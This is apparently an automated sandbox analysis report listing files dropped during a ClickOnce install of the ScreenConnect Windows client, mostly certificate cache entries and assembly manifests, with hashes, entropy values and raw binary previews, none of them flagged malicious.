%............e....I5.=Q..!xE...,.......IpB2......eh..ML..HRh....W]...e...O.,H.V.5........7.....\|...2........t..9..`.....1.......#GG...n..m.....jg-.D......;...2Z..j`T.I....\.o.&....8........o.a4\..E(.6*f(_.s.&%....\...L.b.^3........+..6y.....u.e..HP.w....P.F.aX..\|..<.(.9....S..G.u0..0.v..[K]taM?..v.X.r.)A...m&vh.A.X..&+..MY.x.J>@G_.Ps..#!Y`.dT..!..8.\|f..x8E0.O.cOL....SA\|X=G....2...l<.V.........Y0..U0...U.......0.......0...U......h7..;._....a{..e.NB0...U.#..0.......q]dL..g?....O0...U...........0...U.%..0...+.......0w..+........k0i0$..+.....0...http:/

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	727
Entropy (8bit):	7.5877833615826
Encrypted:	false
SSDEEP:	12:5onfZpqc5RlRtBfQTqAsrUvF+5AcoVm6DOB1qgszZpuRa7Aaq3hvCG8+UxS+3xd:5iicdZ9AQOFwfo4JmZqhaqVE+0b
MD5:	19818DDCAC7E6D84EDDA2D202A8BD6F5
SHA1:	078A354358A3AB745489EC949E64E71B73F800A7
SHA-256:	376FD6FEC42BA09D21B131410EBD956B6C768597D3BBA28D120060CA8F8CA64C
SHA-512:	646010EA61958A0AF74CF6BF53623FDC233291CDB309B7D92DFC1CCE33444E57C693C3186B54AC7E082106FE02A48FAEFC02FF647A5EB09FC2B945F12D0DF36B
Malicious:	false
Preview:	0..........0.....+.....0......0...0..........q]dL..g?....O..20241112184215Z0s0q0I0...+........."..;F..=\@ua..........q]dL..g?....O....@.`.L.^........20241112184215Z....20241119184215Z0....H.............%.'.O..$.)...$v.w.?..L..........]./.Y..r.O.ER..5..E.6i..n..7E.Z.8Cp....B..ml.....}...!.t.....>...+.P..fM.z\....qM v_...E]...1.y.Qu..N.._.s..a.S.g........W...:..0...$...b...._M.[.$.Y..>...G..~R....0U-...y..}.F..t.n\|.o....q(%6...I`.._6.eW.:....Ij.........\|.>n.h..b..r...?u.....)...0{.U.\.....>....Xb.R.6.im.o.et._\$Qr..;..`..Q..a.J...j.WD.>...>.....O..Tw.hX..Y..._.e#.R.1._\.....i...'_..s....M.a.X.$.....V{...3....%...x./.'x.\.Q\|h8'.E~Y>..K.B&/..0..(....:9:p....g.6.........7..V.`.Q.bj.Yd8

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	Certificate, Version=3
Category:	dropped
Size (bytes):	1428
Entropy (8bit):	7.688784034406474
Encrypted:	false
SSDEEP:	24:nIGWnSIGWnSGc9VIyy0KuiUQ+7n0TCDZJCCAyuIqwmCFUZnPQ1LSdT:nIL7LJSRQ+QgAyuxwfynPQmR
MD5:	78F2FCAA601F2FB4EBC937BA532E7549
SHA1:	DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
SHA-256:	552F7BDCF1A7AF9E6CE672017F4F12ABF77240C78E761AC203D1D9D20AC89988
SHA-512:	BCAD73A7A5AFB7120549DD54BA1F15C551AE24C7181F008392065D1ED006E6FA4FA5A60538D52461B15A12F5292049E929CFFDE15CC400DEC9CDFCA0B36A68DD
Malicious:	false
Preview:	0...0..x..........W..!2.9...wu\0....H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...130801120000Z..380115120000Z0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40.."0....H.............0..........sh..]J<0"0i3..%..!=..Y..).=X.v..{....0....8..V.m...y....._..<R.R....~...W.YUr.h.p..u.js2...D.......t;mq.-... .. .c)-..^N..!a.4...^.[......4@_.zf.w.H.fWW.TX..+.O.0.V..{]..O^.5.1..^......@.y.x...j.8.....7...}...>..p.U.A2...sn..\|!L....u]xf.:1D.3@...ZI...g.'..O9..X..$\F.d..i.v.v=Y]Bv...izH....f.t..K...c....:.=...E%...D.+~....am.3...K...}....!........p,A`..c.D..vb~.....d.3....C....w.....!..T)%.l..RQGt.&..Au.z._.?..A..[..P.1..r."..\|Lu?c.!_. Qko....O..E_. ........~.&...i/..-............B0@0...U.......0....0...U...........0...U..........q]dL..g?....O0....H..............a.}.l.........dh.V.w.p...J...x\.._...)V.6I]Dc...f.#.=y.mk.T..<.C@..P.R..;...ik.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	338
Entropy (8bit):	3.4465202453435166
Encrypted:	false
SSDEEP:	6:kK2x+E48w3htsJFN+SkQlPlEGYRMY9z+s3Ql2DUevat:u8J3hBkPlE99SCQl2DUevat
MD5:	BD31FA6D35D593EC7D706AB48F5536F3
SHA1:	23A8130CB201D3891EEFBA4EDD0C26D7F9BE799D
SHA-256:	C1BF04DC571A5DE8B3A31FA17E6E704955B5FE501A27AA26C35E47810CBB0873
SHA-512:	3D5567910CD4A80EFD6DCA269FCEA3AF653104A255033D9E9FD0CD23ECD1468A2664C00D3CA323848E3116730B1AB360BFB50054BF3BC05E7F74FE78B45D73CA
Malicious:	false
Preview:	p...... ........A*...7..(...............................................x(..v6.. .........p.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	328
Entropy (8bit):	3.245596380966818
Encrypted:	false
SSDEEP:	6:kKep/99UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:G2DImsLNkPlE99SNxAhUe/3
MD5:	037AC82BC2F815589F4F8C169B6D38CA
SHA1:	31E977A130450BF6EBBADC006552FCAAE9F55618
SHA-256:	11F945D6C21A710EE0FAE3317023648CF5174DFF8C90FEF3F28387E3A4425EC6
SHA-512:	5AA29870AE4F3B99AD4C82F0CBCEA98D57B0DE36056FF1B52F177E3BA89B7019F876F02E7EF75F0E369C1FD06CE61712CE0A30EB12EF78E05D97A2BE04A34AEC
Malicious:	false
Preview:	p...... ........SgA<16..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C56C4404C4DEF0DC88E5FCD9F09CB2F1

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	308
Entropy (8bit):	3.1981056925460676
Encrypted:	false
SSDEEP:	6:kKVcFzNcalgRAOAUSW0P3PeXJUwh8lmi3Y:9DtWOxSW0P3PeXJUZY
MD5:	C3A296AD3FF7958A97DFE26D570A1E35
SHA1:	2BB218B9A587BDB2266535039F178540FB22DB3D
SHA-256:	F8C6DF886F3B6E47396F3F1518560AD2D9A5477996FBCBFC37AB594EFE99F65C
SHA-512:	42497AFB68B1907393B3D2E92A7F0167732D4999FE025EF5923EF95BA97C1669B89FAE8B7F4ED38023FF1805F7638BE4A021357E8070EC74CBC07372081B4AB6
Malicious:	false
Preview:	p...... ........M..iK6..(....................................................... ........}.-@@......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.G.4.C.o.d.e.S.i.g.n.i.n.g.R.S.A.4.0.9.6.S.H.A.3.8.4.2.0.2.1.C.A.1...c.r.t...".6.0.9.0.3.0.2.2.-.6.b.4."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	412
Entropy (8bit):	3.9734622103410793
Encrypted:	false
SSDEEP:	6:kKscn3/MiSSfOAUMivhClroFfJSUm2SQwItJqB3UgPSgakZdPolRMnOlAkrn:kK30KmxMiv8sFBSfamB3rbFURMOlAkr
MD5:	7A096BD10C338DCB4CBC76437CEDB698
SHA1:	9E2E4C352B09F0BD0FD0CA663FBB3901CA4FCB8D
SHA-256:	A084B978F00BE0B3EADFB9CA95AAA224FBE2F5C2FB510BC81E4B021BAB5FB50A
SHA-512:	080FC268142EE85D5247023FAF3E15F2F8402F5F2E9520AFC06F7FFACF239AAABEF2AEDDC6FE48CD01A0F72A5D0B89A722BDA9E2325E791273CF88EB0BD35072
Malicious:	false
Preview:	p...... ....(.....Cg@6..(................].25.......:.......................:.. ........f...5.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.f.I.s.%.2.B.L.j.D.t.G.w.Q.0.9.X.E.B.1.Y.e.q.%.2.B.t.X.%.2.B.B.g.Q.Q.U.7.N.f.j.g.t.J.x.X.W.R.M.3.y.5.n.P.%.2.B.e.6.m.K.4.c.D.0.8.C.E.A.i.t.Q.L.J.g.0.p.x.M.n.1.7.N.q.b.2.T.r.t.k.%.3.D...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2E248BEDDBB2D85122423C41028BFD4

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	254
Entropy (8bit):	3.0106805074239693
Encrypted:	false
SSDEEP:	6:kKMLpLDcJgjcalgRAOAUSW0PTKDXMOXISKlUp:oLYS4tWOxSW0PAMsZp
MD5:	5B45023FD14D4E66366E9AAF5441E0DD
SHA1:	9E3A8CDC03C8A651C790CE5F7269382F6937A3BA
SHA-256:	3B28F93FF3DF9AE14EB4FD8B4B6B9EF894EFFE0743F1706BE4474C3660518377
SHA-512:	22F0E8F7DA9811E5EF4ACDD7F14B61D49EC7EB71CAC25CFD77834D0A5E2C699F1946C90B8FB77AF04E4A22C15AD012B5D122BEA02D9A56AA7EA0D9ACE7F63207
Malicious:	false
Preview:	p...... ....l......-&6..(....................................................... ............n......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.R.o.o.t.G.4...c.r.t...".5.a.2.8.6.4.1.7.-.5.9.4."...

C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\manifests\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92.cdf-ms

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	25496
Entropy (8bit):	5.630217411128599
Encrypted:	false
SSDEEP:	384:KOrqEitGnph6LOX9jX9R/QPIBM7Y3pzfyT9H8ujZoYzfxut:KnZ8n6LOX9jX9R/QPI+0Zzf+9Jn5ut
MD5:	8E168C69918DBA686178D572957392B3
SHA1:	164A72DA95F111B45C4CC2E6C0ED438154ACF953
SHA-256:	F718703909193D4CCABF92F57AB5730A22FC0E569BD4C2B92304AD8E4A793D25
SHA-512:	A5B7E4584012F89818B06D32F66305BA66220075CDACAC83BC5FDE6441030ACA514386E38555F723013BA96AD5C6FC5C4A3DFA0F12C7D1996558EE6873EBA3A6
Malicious:	false
Preview:	PcmH...........7...bf.......!...T...........................e...?....<.g..J.\|r,..`P....}'.d.........8........R....................U.K...W.....U..c...................'-........s".I...R.....$............?..]k.......S..{.........6.......'~.x.h.....[...........5...M...8..........~9......-.a:...j.......;...K*...!.<......6..A....y.].m..C....=4.....E....&..{.!.G....qz...#aI...@.R....K.....E..X.N....u..IV..R......D..S......3LD.SV...[s.T..<Y...O.&r..Vz\...........`.......=...O...T...W...Z...].......,.......L.......T.......\.......`.......\|...........................................@.......0...........<.......T.......h.......\|...0.......................................0...........<.......T.......h.......\|...0.......................................0...........8.......L.......`...0...l.......................................................................,.......8.......L.......`.......l...........................................................................................@...

C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\manifests\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92.manifest

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10073), with CRLF line terminators
Category:	dropped
Size (bytes):	17858
Entropy (8bit):	5.96124399589564
Encrypted:	false
SSDEEP:	384:rexTuzvdu98aXVEf6/DX9mX9FX9R/QPIYM7Y7:rn6/DX9mX9FX9R/QPIN07
MD5:	7F68A01C2FEA1C80A75E287BB36D6B43
SHA1:	F271EBC2542397E59C3D57D30CC54BF1D9DB4F69
SHA-256:	2E0E46F395D5A6440F179B61C4008ABF3D72CFCDA705A543C8EE18B41D37B025
SHA-512:	C6C1C9D6D9C50F94C9BC8C8A422CD00397EE184B6F6113EA19F9209C0E2339B540EE92D35BCCE81F242D6FDC3C720EC2E56675E702E90C91533A07FA9F9DB753
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.3.7.9067" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.3.7.9067" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" parameter

C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\manifests\scre..core_4b14c015c87c1ad8_0018.0003_none_5334f1fbfe91ad06.cdf-ms

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	3452
Entropy (8bit):	4.216441076557447
Encrypted:	false
SSDEEP:	48:GIE/eF7lMDWW+LgoQe6S+9owQX7gn7mL39KxqzGLI7QwKrIhIYX:GPWW9eV+WwQXUmL39KgGLI7QwKchIYX
MD5:	16D4524684ECCD2069F5C6440A854A19
SHA1:	E702484AD603202A15BC24D1345B87917AE27D8B
SHA-256:	233D97B0D4BCD420569E7CEC68C29634EEA729EB6FB75EEE538875A9EAE657B7
SHA-512:	7A498B0A6079B1B95AD16C521C8055A7DB0AD2237D2B71B4BB21CEFA575F315DA1AB2E58D6E16B764C63ECC5FBF683DAF0CD2E9B6A7F6D965DE0C826243AE3C6
Malicious:	false
Preview:	PcmH.........Q.#{...#...(.......T..........................."........<.g..J.\|r,..`P..............E..X......U..c...................'-........s".I...R.....$............?..]k.....'~.x.h.................z..w.....[~31.X....s)..;$D......B(.........f..VC.........;..........................0...@...0...p...0.......0...................................0.......4.......D.......T.......\...4...h...........P...\...........@...................................,...(...4.......\.......d.......x...(.......................(.......................(...........$...4...,.......`...................................................................................................................................................................................................nameScreenConnect.Core%%processorArchitecture%%%msilpublicKeyToken%%4B14C015C87C1AD8version%24.3.7.9067%....................................................MdHd............D...........MdSp(...$...&...(...#............... urn:schemas

C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\manifests\scre..core_4b14c015c87c1ad8_0018.0003_none_5334f1fbfe91ad06.manifest

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1215
Entropy (8bit):	5.1306699113418395
Encrypted:	false
SSDEEP:	24:JdFYZ8h9onR+geP0AQavSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0AQ2GVETDTo
MD5:	293C100B1896E7532D241DAC2B32DCB3
SHA1:	1E14B49C9AF799DA0371474BF712F3AC3E5B6EBC
SHA-256:	AC3C489C02264FF1918FC0B79083A7754B98542A6CC4E2AF67EAFDBF76C6232E
SHA-512:	ED3935D90F48043BE2BF7A60CACBB47964672EAB0C9EBFC2EEAC8EBC4341383F32F55901601DE56698EEF6AEC6399E77EB8DEC6F5158D1B3761D5F25ADFC3499
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.3.7.9067" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssemb

C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\manifests\scre..dows_4b14c015c87c1ad8_0018.0003_none_57acc9dd3adfc036.cdf-ms

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	5256
Entropy (8bit):	4.232110107327244
Encrypted:	false
SSDEEP:	96:ESP+RxlyBeV+Ww7Nkg99K1kPHZ5H3Y8OngnsRK:URxlzJxg996Y55OQv
MD5:	FE92E590C63F6CC03D9A75F18E67CE08
SHA1:	EABCE87095AE9B6BE2D553DE614F936B9EA10443
SHA-256:	E5238B1E83BF9AD5276BDBC8A2FD0C3C7D4FBDD5CF93A25D6E74A84600259F45
SHA-512:	CB92F28ABC08E3FD8D6DE10E80BCFDC750195E68DE536ED0E93FBCFB662505610ADF6B5367DC4A736B92C299937C54A9DEDC32E5C017341BC6ABF70CE22EDB48
Malicious:	false
Preview:	PcmH........[B....+.4...t.......T...............P...........3........<.g..J.\|r,..`P............O.&r..Vz.....U..c...................'-........s".I...R.....$............?..]k.....[.......................z..w.....[~31.X......E..X.....s".I...R....C.........y..&..d."....B(.....#...^.ie...u&...F.....Ey)....+.`...m,......;../............... ...$...'...*...-...0...0.......0...D...0...t...0.......0.......0.......0...4...0...d...................................................................4...........4...P...........h...@.......................................(...................$.......8...(...H.......p.......x...(...............................(.......................(... .......H.......P...(...`...................(.......................(...............d...........l.......................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\manifests\scre..dows_4b14c015c87c1ad8_0018.0003_none_57acc9dd3adfc036.manifest

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1980
Entropy (8bit):	5.057602063510745
Encrypted:	false
SSDEEP:	24:JdFYZ8h9onRbggeP0AQYvSkcyMQgcVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AQ0HMQgGQAXRTFgTo
MD5:	88ECD545BDBE3ED49C6A2B87589102EC
SHA1:	E72949AF66B0A20E50474D2005E320BA63BA9B2B
SHA-256:	D48AFB709E61B86EB6EEF67B41D0FA7EC780C4536F5CF9ACA7A0B440AED98EF0
SHA-512:	7ED19ED32E02348ABC8A64CA0A21E05496A6595A8B94D3F960CF3F6A6C6445D30AAD7AEC09CE76776023F9E5F4B40DF032408DEFFBA102026247099879CB95DE
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.3.7.9067" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.3.7.9067" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende

C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\manifests\scre..ient_4b14c015c87c1ad8_0018.0003_none_b47bcb1fe7759013.cdf-ms

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	6584
Entropy (8bit):	4.143798062220447
Encrypted:	false
SSDEEP:	96:04GBPPbpvEeV+Wwwx8Wpm2TOtPO6gb6OL6IJrtNrn6qB/B:cPPxJxpmZPQb6OOgNr6k
MD5:	F12A14D6D6DB9370ABF76D203C0CFE27
SHA1:	2B0325418E00816BB60B6804E1937579CA21F0E5
SHA-256:	AAF52D05A43C5AA4A6017E6E2F401D9FECD07631C248F67714E35CF760355D48
SHA-512:	942410F7C6BB4ACEA78B16A186361E6F5300F303E82C68209634E3F058AA0380F04F78469D578714EA56FFEAB47197B6FE1D9745E585FA7EAF7DF59C7B967254
Malicious:	false
Preview:	PcmH.........Z.PBc..@...........T...............t...........?........<.g..J.\|r,..`P.............U.K...W.....U..c...................'-........s".I...R.....$............?..]k.........}'.d................z..w.....[~31.X......E..X.....s".I...R....y..&..d."....B(.....#...C.....&...^.ie...u)...O.&r..Vz,...F.....Ey/...[s.T..<2...f..VC..5......;..8.....V....X;........... ...$...'...*...-...0...3...6...9...<...0.......0.......0.......0...4...0...d...0.......0.......0.......0...$...0...T...0.......................................................................4...$.......X...P...T...........@...................................,...(...4.......\.......d.......x...(...............................(.......................(...........D.......L...(...`...................(.......................(.......................(...,.......T.......\...(...h...................(.......................(...................................................................................................

C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\manifests\scre..ient_4b14c015c87c1ad8_0018.0003_none_b47bcb1fe7759013.manifest

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	2569
Entropy (8bit):	5.027116382154264
Encrypted:	false
SSDEEP:	48:3FYZ8h9o5gI0AQLHMQgAXQ3MQgTMQgRGTDBTo:1YiW4AQ4QRvQ9QY
MD5:	6A1C3FF3E8F5E23698453B4CCDA2FD12
SHA1:	C7EED4383B7F1982222E663A0B8850D09B6B20EF
SHA-256:	8AA9DACC29FAEF7BE40D54B45FBA75AFC13BF25638D9A46DC4B516529AE74619
SHA-512:	C9F09C968D71F4D7481C1AADBF8337FBCE052F71AA168795DAF374D53CC827BA9E7F1CF9ADC50FC423CF68EE500BFC931DD2E14648626ED7D688F1A41447DCCC
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.3.7.9067" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.3.7.9067" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.

C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\manifests\scre..ient_4b14c015c87c1ad8_0018.0003_none_e94a4fce0de1030a.cdf-ms

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	3032
Entropy (8bit):	4.731228193192962
Encrypted:	false
SSDEEP:	48:/qQ/c1gome6S+9oww7gV7ztoVXeSnxW6xe1YeCY+1Bnwb8:/l/cceV+WwwSztoV7xhxwYeCY+rnE8
MD5:	CE5B5B15099F5A3876508FD46B1B259E
SHA1:	9E1EC4672E15931635716CBF2857A4E82356E0D5
SHA-256:	780DB11631CC36CFCB3800C0D0136A3D113D29E201B336042155AB534290AF40
SHA-512:	EF06784268D9CD1FEA0C104ADAA6F364045DA7A81160133571DB3044BDC6F7ED076D0D8EE0B7AEC94441D8E0BD6794C3188D221815F8649848D9B63954FF2E48
Malicious:	false
Preview:	PcmH..........%..r@.............T....................................<.g..J.\|r,..`P............[s.T..<.....U..c...................'-........s".I...R.....$............?..]k.......S..{..................z..w.....[~31.X......E..X.....s".I...R.......;......................0.......0...@...0...p...................................................................4...........<...P...........P...@...h...................................(...............................(...,.......T.......\...(...d...........(...............................................................................................................................................................nameScreenConnect.ClientprocessorArchitecture%%%msilpublicKeyToken%%4B14C015C87C1AD8version%24.3.7.9067%....................................................MdHd............<...........MdSp ...$....... ...".............n: urn:schemas-microsoft-com:asm.v1.assembly.xmlns.1.0.manifestVersion urn:schemas-microsoft-com:asm.v2.asmv2)

C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\manifests\scre..ient_4b14c015c87c1ad8_0018.0003_none_e94a4fce0de1030a.manifest

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1039
Entropy (8bit):	5.151589954158412
Encrypted:	false
SSDEEP:	24:JdFYZ8h9onRigeP0AQ6vSkcyMQgcVSkTo:3FYZ8h9oYgI0AQWHMQgGTo
MD5:	618DC5F6C85A2057BC7A86C5F498E2F1
SHA1:	5073B2C3A117985E8F26ED5BEA8C93A5BB202EEA
SHA-256:	F1BF5014656D836A4C5C42E7ED67FF368D1706C41082E1E4F33ABF9CDA09D647
SHA-512:	A8ED838573EF9A4119A4D32335543EA5074250D47212068EF2C4B470A451EB0154BCEB8B3BF8B0722D4250122F6B5A196383576F715FD938D3CCB6CBDE7C2799
Malicious:	false
